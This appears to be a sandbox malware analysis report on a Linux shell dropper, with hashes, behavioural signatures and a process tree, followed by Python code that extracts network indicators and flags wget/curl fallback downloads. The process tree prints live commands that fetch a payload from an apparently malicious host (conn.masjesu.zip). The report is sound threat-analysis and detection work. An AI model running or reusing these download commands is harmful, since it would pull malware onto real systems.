Analysis

  • max time kernel
    148s
  • max time network
    17s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    28/10/2024, 02:13

General

  • Target

    1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh

  • Size

    10KB

  • MD5

    85d74baef7ce93fd942b1abca31bf2dd

  • SHA1

    a7e677437c07ce76e9242021261bc10ae3c1728e

  • SHA256

    1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1

  • SHA512

    01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677

  • SSDEEP

    192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS

Score
4/10

Signatures

  • Checks CPU configuration (1 TTP, 1 IoC)

    Reads CPU information that can indicate whether the system is a virtual machine. In the process tree below this fires on the curl child (PID 655), not on the script itself.

  • Reads runtime system information (2 IoCs)

    Reads data from the /proc virtual filesystem. Also attributed to the curl child (PID 655).

  • System Network Configuration Discovery (1 TTP, 2 IoCs)

    Adversaries may gather information about the network configuration of a system. Attributed to both download attempts (wget, PID 645, and curl, PID 655).

Processes

  • /tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
    /tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
    1⤵
      PID:641
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:643
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • System Network Configuration Discovery
          PID:645
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:655
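The process tree above is the whole behaviour the sandbox recorded: delete a local bins.sh, then fetch one URL with wget and again with curl. The Python below is an added example, not part of this report or of the sample, that extracts network IoCs from such command lines and flags the "same payload, several downloaders" fallback that bins.sh-style droppers use so that whichever fetcher exists on the victim succeeds. The command lines are copied from the process tree; the heuristic and the function names are my own.

```python
import re
from urllib.parse import urlparse

# Command lines copied from this report's process tree (the only input the
# analysis below needs); the rest of this block is added example code.
PROCESS_TREE = [
    "/bin/rm bins.sh",
    "wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d",
    "curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d",
]

# Fetchers commonly tried in sequence by IoT/Linux droppers (assumed list).
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
URL_RE = re.compile(r"https?://[^\s'\"]+")


def extract_iocs(cmdlines):
    """Return network IoCs and behavioural flags for a list of command lines."""
    urls, hosts, fetchers, removed = [], set(), [], []
    for cmd in cmdlines:
        argv = cmd.split()
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]  # strip /bin/, /usr/bin/ prefixes
        if prog == "rm":
            # Droppers delete their own stage (bins.sh) before re-fetching it.
            removed.extend(a for a in argv[1:] if not a.startswith("-"))
        for url in URL_RE.findall(cmd):
            urls.append(url)
            host = urlparse(url).hostname
            if host:
                hosts.add(host)
            if prog in DOWNLOADERS:
                fetchers.append((prog, url))
    # Several different fetchers pulling one identical URL is the fallback
    # pattern; a single wget on its own does not trigger it.
    distinct_urls = {u for _, u in fetchers}
    distinct_progs = {p for p, _ in fetchers}
    fallback = len(distinct_urls) == 1 and len(distinct_progs) > 1
    return {
        "urls": sorted(set(urls)),
        "hosts": sorted(hosts),
        "fetchers": fetchers,
        "removed_files": removed,
        "multi_fetcher_fallback": fallback,
    }


def verdict(iocs):
    """Human-readable reasons for treating the process tree as a dropper."""
    reasons = []
    if iocs["multi_fetcher_fallback"]:
        progs = ", ".join(p for p, _ in iocs["fetchers"])
        reasons.append(f"same payload URL fetched with {progs}")
    if iocs["removed_files"]:
        reasons.append("deletes local stage file(s): " + ", ".join(iocs["removed_files"]))
    for host in iocs["hosts"]:
        reasons.append(f"contacts {host}")
    return reasons


if __name__ == "__main__":
    result = extract_iocs(PROCESS_TREE)
    for line in verdict(result):
        print("-", line)
```

Feed it the command lines from any report of this family and the `hosts` list is what goes into a DNS block or sinkhole entry; `multi_fetcher_fallback` is the cheap behavioural signal that distinguishes a dropper from an administrator's lone `curl -O`.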

      MITRE ATT&CK Enterprise v15
